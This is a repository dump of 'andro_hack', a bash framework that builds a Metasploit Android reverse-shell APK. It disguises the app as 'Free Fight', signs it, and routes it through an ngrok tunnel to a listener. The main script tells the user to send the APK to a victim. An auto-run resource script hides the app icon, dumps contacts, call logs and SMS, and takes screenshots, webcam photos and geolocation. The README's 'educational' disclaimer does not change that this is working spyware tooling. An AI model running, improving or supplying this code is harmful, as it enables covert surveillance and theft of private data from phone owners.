├── .github
    └── FUNDING.yml
├── README.md
├── andro_get_details.sh
├── drawable
    └── icon.png
├── ir.wav
├── last.wav
├── location.sh
├── main.sh
├── ngcheck.sh
├── payload1.sh
└── setup.sh


/.github/FUNDING.yml:
--------------------------------------------------------------------------------
# These are supported funding model platforms

github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
patreon: # Replace with a single Patreon username
open_collective: # Replace with a single Open Collective username
ko_fi: # Replace with a single Ko-fi username
tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
liberapay: # Replace with a single Liberapay username
issuehunt: # Replace with a single IssueHunt username
otechie: # Replace with a single Otechie username
lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# andro_hack
andro_hack is a framework that generates a signed APK payload to penetrate Android platforms.

# Legal Disclaimer:

The author does not hold any responsibility for the bad use of this tool;
remember that it is for educational purposes only.


# Requirements:

1. MSFvenom

   https://github.com/g0tmi1k/msfpc

2. zipalign

       sudo apt-get install -y zipalign

3. apktool

   https://ibotpeaches.github.io/Apktool/

4. jarsigner


5. ngrok (downloaded automatically when you run this framework)


# Config/Usage:

- Extract this zip file into your Desktop

- Open a terminal and change the directory to andro_hack

- Set script execution permission

      cd andro_hack
      chmod 777 setup.sh

- Run the andro_hack framework:

      ./setup.sh

--------------------------------------------------------------------------------
/andro_get_details.sh:
--------------------------------------------------------------------------------
exploit
hide_app_icon
wakelock
cd /
cd sdcard
upload last.wav
upload ir.wav
cd /
sysinfo
check_root
getuid
localtime
pwd
ls -l
app_list
ps
dump_contacts
dump_calllog
dump_sms
screenshot
webcam_list
webcam_snap
ifconfig
ipconfig
portfwd
route
geolocate
play last.wav
play ir.wav

--------------------------------------------------------------------------------
/drawable/icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jithinkc22j/andro_hack/3121ac1c89c4c42e610153159218e59deaa055df/drawable/icon.png
--------------------------------------------------------------------------------
/ir.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jithinkc22j/andro_hack/3121ac1c89c4c42e610153159218e59deaa055df/ir.wav
--------------------------------------------------------------------------------
/last.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jithinkc22j/andro_hack/3121ac1c89c4c42e610153159218e59deaa055df/last.wav
--------------------------------------------------------------------------------
/location.sh:
--------------------------------------------------------------------------------
echo "----------------------------------------------------------------------"
echo " "
echo " -----------------Location FInder termminal--------------------------- "
echo " "
echo "----------------------------------------------------------------------"
echo " "
echo "Note copy the longitude and lattitude and paste here.."
echo " "
read -p " Enter Longit : " lo
echo " "
read -p " Enter lattitude : " lat
echo " "
echo " OPening Google Map location....... "
sleep 0.5
n=www.google.com/maps/place/$lo,$lat
xdg-open https://$n

--------------------------------------------------------------------------------
/main.sh:
--------------------------------------------------------------------------------
red='\e[1;31m'
yellow='\e[1;33m'
white='\e[1;37m'
Escape="\033";
RedF="${Escape}[31m";
green='\e[0;32m'
# cleaning previous apk
#if [( $(ls | grep -w *".apk"))== *".apk"]
#then
rm $(ls | grep -w *".apk");
gnome-terminal -e "bash -c \" ./ngcheck.sh; exec bash\""
echo "--------------------------------------------------------------------------------------"
echo " "
echo " --------------------------ngrok public tunnel opend----------------------------------"
echo " "

echo " Copy the Public host & port Number from ngrok terminal (Forwarding tcp://(this lhost)--> 0.tcp.ngrok.io:55555 <--(this loprt))"
echo " "
echo -e $red "Note: Don't close the ngrok terminal"
echo -e $white " "
read -p "Enter the lhost :" lhost
echo " "
read -p "Enter the lport :" lport
echo " "
read -p "Enter the name of apk you need :" ap
echo " "
echo "--------------------------------------------------------------------------------------"
echo " "
echo " ------------------------Payload Generating section-----------------------------------"
echo " "
i=1
b=2
for i in {1..50}; do
    val=`expr $i % $b`

    if [ $val == 0 ]
    then
        ip='-'
        str1="$str1$ip"
        printf '\r Generating apk - %s> ' $str1; sleep 0.1;
    else
        ip='-'
        str1="$str1$ip"
        printf '\r Generating apk - -%s' $str1; sleep 0.1;
    fi
done
s=$(whoami)
echo " "

msfvenom --arch dalvik --platform android --payload android/meterpreter/reverse_tcp lhost=$lhost lport=$lport /home/$s/Desktop>$ap.apk
#----------------------------------------------------------------------------------------
echo " "
echo " Payload generated................."
echo " "
sleep 0.5
echo " Decompiling apk.................. "
echo " "
apktool d $ap.apk
echo " "
echo " Creating app icon................."
echo " "
sleep 0.5
cp -r drawable /home/$s/Desktop/andro_hack/$ap/res/
echo " "
echo " Copying app icon-drawable to main. "
echo " "
cd $ap
sed -i '29d' AndroidManifest.xml
sleep 0.5
echo " Editing AndroidManifest activity... "
echo " "
sed -i '28a' AndroidManifest.xml
sleep 0.5
sed -i '26a' AndroidManifest.xml
sed -i '26a' AndroidManifest.xml
sed -i '26a' AndroidManifest.xml
sed -i '26a' AndroidManifest.xml
sed -i '26a' AndroidManifest.xml
sed -i '26a' AndroidManifest.xml
sed -i '26a' AndroidManifest.xml
sed -i '26a' AndroidManifest.xml
sed -i '26a' AndroidManifest.xml
sleep 0.5
cd res
cd values
sed -i '3d' strings.xml
sed -i '2aFree Fight' strings.xml
cd --
cd /home/$s/Desktop/andro_hack/
sleep 0.5
echo " "
echo " App icon created................... "
echo " "
sleep 0.5
echo " Compiling the $ap.apk file........."
apktool b $ap
sleep 0.5
echo " "
echo " Removing existing apk file....... "
rm $ap.apk
sleep 0.5
cd $ap/dist/
sleep 0.5
cp -r $ap.apk /home/$s/Desktop/andro_hack/
sleep 0.5
echo " "
echo " Copying $ap.apk to main file.... "
echo " "
cd --
cd /home/$s/Desktop/andro_hack/
rm -r $ap
echo " Removing the Decompiled $ap folder"
echo " "
echo " Your application successfully created "
echo " "
sleep 0.5
echo " Your $ap.apk needed signing for (fake) verification"
echo " "
echo " -----------------------------APK signing section-------------------------------------"
echo " "
echo -e $yellow " Asking for App information just fill randomly and remember the password :${red} android"
echo " "
echo -e $white "-------------------------------------------------------------------------------------- "
echo " "
echo " Creating Keystore................."
echo " "
sleep 0.5
echo " "
echo " Executing the Keystore............ "
echo " "
sleep 0.5
keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias my-alias
echo " "
echo " Successfully created keystore....."
echo " "
echo "------------------------------------------------------------------------------------------- "
echo " "
echo " Signing Your application.........."
echo " "
sleep 0.5
echo " Signing the apk using jarsigner.."
echo " "
jarsigner -keystore key.jks -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $ap.apk my-alias
echo " "
echo " Successfully signed the apk ....."
echo " "
echo " Zipaligning the apk..............."
echo " "
sleep 0.5
zipalign -v 4 $ap.apk new_$ap.apk
mv new_$ap.apk $ap.apk
echo "------------------------------------------------------------------------------------------- "
echo " "
echo " Opening file system..............."
echo " "
sleep 0.5
echo " Send the apk to victim ..........(Note : after installing the apk name will changed to Free Fight.)"
sleep 0.5
rm key.jks
xdg-open /home/$s/Desktop/andro_hack
sleep 0.5
i=1
while [ $i == 1 ]
do
    echo " "
    read -p " Are you sent the apk [y/n] : " pass
    case "$pass" in
        "y")echo " "
            read -p " Do you want to open exploit now! [y/n] : " pas
            case "$pas" in
                "y")echo " "
                    echo " "
                    echo "------------------------------ Exploit- Listener --------------------------------- "
                    echo " "
                    sleep 0.5
                    echo " Starting Apache2 service............. "
                    sleep 0.5
                    sudo service apache2 start
                    echo " "
                    sleep 0.5
                    echo " Starting Postgresql service.......... "
                    echo " "
                    sudo service postgresql start
                    echo " "
                    sleep 0.5
                    echo " Opening Msfconsole exploit........... "
                    echo " "
                    sleep 0.5
                    echo "--------------------------------MSFCONSOLE--------------------------------------- "
                    echo " "
                    break
                    ;;
                "n") echo " "
                    echo " Waiting for your confirmation......."
                    echo " "
                    sleep 0.5
                    echo " Send the apk to victm.............."
                    sleep 0.8
                    ;;
            esac
            ;;
        "n")echo " "
            echo " Waiting for your confirmation........"
            echo " "
            sleep 0.5
            echo " Send the apk to victm................"
            echo " "
            sleep 0.8
            ;;
    esac
done
#-------------------------------------------------------------------------------------------
#function listeners
echo " Note:-"
echo " . This will automatically collect all details of victim such as process,files,app list,etc."
echo " . If you need victim files use the command- download 'path to file' "
echo " . copy the longitude and lattitude from lister terminal and paste in location finder terminal"
echo " "
sleep 1
gnome-terminal -e "bash -c \" ./location.sh; exec bash\""
msfconsole -x -f -r ./payload1.sh

--------------------------------------------------------------------------------
/ngcheck.sh:
--------------------------------------------------------------------------------
echo " Checking ngrok ....... "
s=$(whoami)
echo " "
sleep 0.1
d= find | grep -w "ngrok.yml"
if [ $d = "./.ngrok2/ngrok.yml" ]
then
    echo "ngrok found.........."
    echo " "
    read -p "Enter the full path to ngrok :" pathn
    echo " "
    cd $pathn
    echo " "
    read -p "Enter your authentication token :" toke
    echo " "
    tt= ./ngrok authtoken $toke | grep -w "ERROR"
    if [ $tt = "ERROR: You must pass a single argument, the authtoken to save to configuration file." ]
    then
        echo " "
        echo " Token Authentication Failed....... "
        echo " "
        exit
    else
        ./ngrok authtoken $toke
        echo " "
        echo "Authentication successful & opening ngrok terminal "
        echo " "
        ./ngrok tcp 3389
        exit
    fi
else
    echo " "
    echo "ngrok not found........"
    echo " "
    sleep 0.5
    echo " Downloading ngrok ....."
    echo " "
    sleep 0.5
    echo " Register in ngrok - opening ngrok website.."
    echo " "
    sleep 0.5
    xdg-open https://dashboard.ngrok.com/signup
    while [ 1==1 ]
    do
        read -p " Have you completed registration [y/n] :" pp
        echo " "
        if [ $pp = 'y' ]
        then
            echo " Opening ngrok downloading page............. "
            echo " "
            sleep 0.5
            xdg-open https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
            echo " "
            sleep 0.5
            read -p " completed downloading..? [y/n] :" po
            echo " "
            sleep 0.5
            if [ $po = 'y' ]
            then
                cd /home/$s/Downloads
                unzip ngrok-stable-linux-amd64.zip -d ngrok-stable-linux-amd64
                sleep 2
                cd ngrok-stable-linux-amd64
                echo " "
                read -p "Enter your authentication token :" toke
                echo " "
                tt= ./ngrok authtoken $toke | grep -w "ERROR"
                echo " "
                if [ $tt = 'ERROR: You must pass a single argument, the authtoken to save to configuration file.' ]
                then
                    echo " "
                    echo " Token Authentication Failed....... "
                    echo " "
                    exit
                else
                    ./ngrok authtoken $toke
                    echo " "
                    echo "Authentication successful & opening ngrok terminal "
                    echo " "
                    sleep 0.5
                    echo " Opening ngrok terminal "
                    echo " "
                    ./ngrok tcp 3389
                    exit
                fi
            else
                echo " "
                echo " Waiting for completing your downloaad "
                echo " "
            fi
        fi
    done
fi

--------------------------------------------------------------------------------
/payload1.sh:
--------------------------------------------------------------------------------
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 3389
resource andro_get_details.sh

--------------------------------------------------------------------------------
/setup.sh:
--------------------------------------------------------------------------------
chmod 777 main.sh andro_get_details.sh location.sh ngs.sh payload1.sh
./main.sh

--------------------------------------------------------------------------------